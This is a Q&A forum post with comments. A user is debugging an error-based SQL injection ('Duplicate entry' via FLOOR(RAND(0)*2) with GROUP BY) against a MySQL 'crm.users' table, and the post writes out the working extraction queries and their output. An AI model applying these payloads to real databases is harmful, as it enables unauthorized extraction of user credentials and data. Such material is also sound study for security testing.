# Error-based SQL-injection doesn't work on my MySQL DB

Tags: mysql, sql-injection

I try to perform an SQL-injection that based on `Duplicate entry` error. It was well described [here](https://stackoverflow.com/questions/11787558/sql-injection-attack-what-does-this-do). But in my case it works only for several columns, not for all. For example it works for `id` column and doesn't work for `login` column of `users` table. I can also extract such info as `version()` using this approach. But why this can't work for any columns?

**Examples:**

This works and throws `Duplicate Entry` error as supposed:

```
SELECT COUNT(*),
       CONCAT((SELECT CONCAT(users.id)
               FROM crm.users LIMIT 1), 0x20, FLOOR(RAND(0)*2)) x
FROM information_schema.tables GROUP BY x
```

But this doesn't work:

```
SELECT COUNT(*),
       CONCAT((SELECT CONCAT(users.login)
               FROM crm.users LIMIT 1), 0x20, FLOOR(RAND(0)*2)) x
FROM information_schema.tables GROUP BY x
```

The only difference is column name. But second example returns a table like this instead of error:

```
COUNT(*) x
157      admin 0
128      admin 1
```

No errors in second case. What is the reason?

Comment: Do you have users where the login field is null?

Comment: @Shadow, no I don't.

Comment: Then execute both queries without the count and the group by to see what each returns. The answer will probably be in those resultsets.

Comment: @Shadow, in "login" case I can see a lot of alternating rows with `admin 0` and `admin 1`. In "version()" case I can see a lot of alternating rows `5.5.50 0` and `5.5.50 1`. In `id` case I can see a lot of alternating rows `312030` and `312031`. Seems like `id` case incurs HEX (or other) casting, because the actual value of `id` is 1. But I can't find the real answer anyway, or maybe I just don't understand.